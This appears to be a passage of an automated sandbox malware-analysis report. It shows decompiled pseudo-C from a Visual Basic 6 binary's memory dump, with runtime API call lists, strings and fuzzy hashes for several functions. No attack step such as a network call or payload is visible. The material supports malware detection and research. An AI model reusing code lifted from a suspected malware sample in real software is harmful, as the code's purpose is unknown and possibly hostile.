        Function 00434221, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 87COMMON
        Download Yara Rule
        C-Code - Quality: 68%
        			E00434221(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				signed int _t26;
				char* _t33;
				intOrPtr* _t40;
				void* _t47;
				void* _t49;
				intOrPtr _t50;
				intOrPtr* _t51;

				_t50 = _t49 - 0xc;
				 *[fs:0x0] = _t50;
				_t51 = _t50 - 0x38;
				_v16 = _t51;
				_v12 = 0x4011e0;
				_v8 = 0;
				_t40 = _a4;
				 *((intOrPtr*)( *_t40 + 4))(_t40, __edi, __esi, __ebx,  *[fs:0x0], 0x401226, _t47);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v52 = 0;
				L00401334();
				L00401334();
				_t26 =  &_v52;
				_push(_t26);
				_push(1);
				_v44 = 0x20;
				_v52 = 2;
				L004012CE();
				L0040136A();
				_push(_t26);
				_push(0x431de4);
				L00401352();
				asm("sbb esi, esi");
				L0040134C();
				_t33 =  &_v52;
				L0040133A();
				if( ~( ~( ~_t26)) != 0) {
					L004012D4();
					 *_t51 =  *0x4011d4;
					 *_t51 =  *0x4011d0;
					 *_t51 =  *0x4011cc;
					 *_t51 =  *0x4011c8;
					_t26 =  *((intOrPtr*)( *_t40 + 0x2c8))(_t40, 6, _t33, _t33, _t33, _t33, _t26);
					asm("fclex");
					if(_t26 < 0) {
						_push(0x2c8);
						_push(0x431620);
						_push(_t40);
						_push(_t26);
						L0040135E();
					}
				}
				asm("wait");
				_push(0x434347);
				L0040134C();
				L0040134C();
				return _t26;
			}


















        0x00434224
        0x00434233
        0x0043423a
        0x00434240
        0x00434243
        0x0043424c
        0x0043424f
        0x00434255
        0x0043425e
        0x00434261
        0x00434264
        0x00434267
        0x0043426a
        0x00434275
        0x0043427a
        0x0043427d
        0x0043427e
        0x00434280
        0x00434287
        0x0043428e
        0x00434298
        0x0043429d
        0x0043429e
        0x004342a3
        0x004342ac
        0x004342b5
        0x004342ba
        0x004342bd
        0x004342c5
        0x004342cf
        0x004342dc
        0x004342e6
        0x004342f0
        0x004342fa
        0x00434300
        0x00434306
        0x0043430a
        0x0043430c
        0x00434311
        0x00434316
        0x00434317
        0x00434318
        0x00434318
        0x0043430a
        0x0043431d
        0x0043431e
        0x00434339
        0x00434341
        0x00434346

        APIs
        • __vbaStrCopy.MSVBVM60 ref: 0043426A
        • __vbaStrCopy.MSVBVM60 ref: 00434275
        • #606.MSVBVM60(00000001,?), ref: 0043428E
        • __vbaStrMove.MSVBVM60(00000001,?), ref: 00434298
        • __vbaStrCmp.MSVBVM60(00431DE4,00000000,00000001,?), ref: 004342A3
        • __vbaFreeStr.MSVBVM60(00431DE4,00000000,00000001,?), ref: 004342B5
        • __vbaFreeVar.MSVBVM60(00431DE4,00000000,00000001,?), ref: 004342BD
        • __vbaFpI4.MSVBVM60(00431DE4,00000000,00000001,?), ref: 004342CF
        • __vbaHresultCheckObj.MSVBVM60(00000000,004011E0,00431620,000002C8,?,?,?,?,00000000,00431DE4,00000000,00000001,?), ref: 00434318
        • __vbaFreeStr.MSVBVM60(00434347,00431DE4,00000000,00000001,?), ref: 00434339
        • __vbaFreeStr.MSVBVM60(00434347,00431DE4,00000000,00000001,?), ref: 00434341
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$Copy$#606CheckHresultMove
        • String ID:
        • API String ID: 4172741608-3916222277
        • Opcode ID: 5a8043274ec3f35f8914c9c38057d1c332d5f91f4621789a174cae3af2a671c0
        • Instruction ID: 1d905b4b87bd3e13d6c320388fdb852331afa8df3d2e0882f6927c9798857272
        • Opcode Fuzzy Hash: 5a8043274ec3f35f8914c9c38057d1c332d5f91f4621789a174cae3af2a671c0
        • Instruction Fuzzy Hash: DA317C70900209EBDB10EF92DC86AEEBBB8FF08704F10412EF951B71A1DB382505CB99
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00434364, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
        Download Yara Rule
        APIs
        • __vbaStrCopy.MSVBVM60 ref: 004343C1
        • __vbaVarTstNe.MSVBVM60(?,?), ref: 004343FB
        • __vbaVarDup.MSVBVM60(?,?), ref: 00434451
        • #596.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 00434475
        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0043447F
        • __vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004344A5
        • __vbaFreeStr.MSVBVM60(004344EF,?,?), ref: 004344E1
        • __vbaFreeStr.MSVBVM60(004344EF,?,?), ref: 004344E9
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$#596CopyListMove
        • String ID: DRIBLET
        • API String ID: 2863382718-2417547119
        • Opcode ID: 43c4fdf18efe43b910ad062fa694b2d6db2f07971848099055bbdb5409d67634
        • Instruction ID: f4f6b0e92a3e2a98d954c24b7ec6cbc03208748010ff71db245f44bdaa6ba199
        • Opcode Fuzzy Hash: 43c4fdf18efe43b910ad062fa694b2d6db2f07971848099055bbdb5409d67634
        • Instruction Fuzzy Hash: 004152B2D0025CAEDB51DFA4D881BDEBBF8BB08304F5041ABE509F7251EB7466888F55
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00434502, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
        Download Yara Rule
        APIs
        • __vbaStrCopy.MSVBVM60 ref: 0043454E
        • #573.MSVBVM60(?,?), ref: 00434568
        • __vbaVarTstNe.MSVBVM60(?,?,?,?), ref: 00434583
        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?), ref: 00434595
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401208,00431620,00000084), ref: 004345C8
        • __vbaFreeStr.MSVBVM60(004345F5), ref: 004345EF
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$#573CheckCopyHresultList
        • String ID: K
        • API String ID: 3527455153-856455061
        • Opcode ID: ade23463541412b13f15e85aef0a5dbee96b6d94cab8b2f6ce44c503c39c7c2f
        • Instruction ID: 7bf7b360825444399c271af599b7ab2a017e0903124318ae056307419602d92d
        • Opcode Fuzzy Hash: ade23463541412b13f15e85aef0a5dbee96b6d94cab8b2f6ce44c503c39c7c2f
        • Instruction Fuzzy Hash: 9E2126B1C00208ABCB00EF95C885ADEFBBCAF48704F10512BE505B7291D778A5848BA9
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0043401C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69COMMON
        Download Yara Rule
        APIs
        • __vbaNew2.MSVBVM60(00431AD4,00435448,?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00434071
        • __vbaHresultCheckObj.MSVBVM60(00000000,0024F6F4,00431AC4,00000014), ref: 00434095
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00431AE4,000000E0), ref: 004340BE
        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 004340CC
        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 004340D4
        • __vbaFreeStr.MSVBVM60(00434101), ref: 004340FB
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$CheckFreeHresult$MoveNew2
        • String ID: td
        • API String ID: 2347022188-1079315276
        • Opcode ID: f06fcd3b49271363e8226d4cbc401ff751421c2f9b0e85f1011ed9437727f03d
        • Instruction ID: a4956402939807ec5e5ef22778d0a31415ccaeecceb8b317b30c2d63959e849a
        • Opcode Fuzzy Hash: f06fcd3b49271363e8226d4cbc401ff751421c2f9b0e85f1011ed9437727f03d
        • Instruction Fuzzy Hash: E2214170E40604ABCB14EFA5C845EEEFBF8FF98704F24545AE501B72A0C77869418BA9
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00433E84, Relevance: 10.5, APIs: 7, Instructions: 45COMMON
        Download Yara Rule
        APIs
        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433ECD
        • #612.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433ED6
        • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433EDF
        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433EE9
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433EF1
        • __vbaFreeStr.MSVBVM60(00433F1E,?,?), ref: 00433F10
        • __vbaFreeStr.MSVBVM60(00433F1E,?,?), ref: 00433F18
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$Move$#612Copy
        • String ID:
        • API String ID: 672936406-0
        • Opcode ID: 9221ade140e710741bedebee5bf74f0748fbd47e7a864519dde6df037f916f73
        • Instruction ID: 4bfb11ec3929a9bd519f12f7881e68727b2329f7a2d0323a2f4c24461b2d9609
        • Opcode Fuzzy Hash: 9221ade140e710741bedebee5bf74f0748fbd47e7a864519dde6df037f916f73
        • Instruction Fuzzy Hash: CB110C75C10219ABCB00EFE5D9869EEBBB8BF08704F40406FF501B3691DB786A05CB99
        Uniqueness

        Uniqueness Score: -1.00%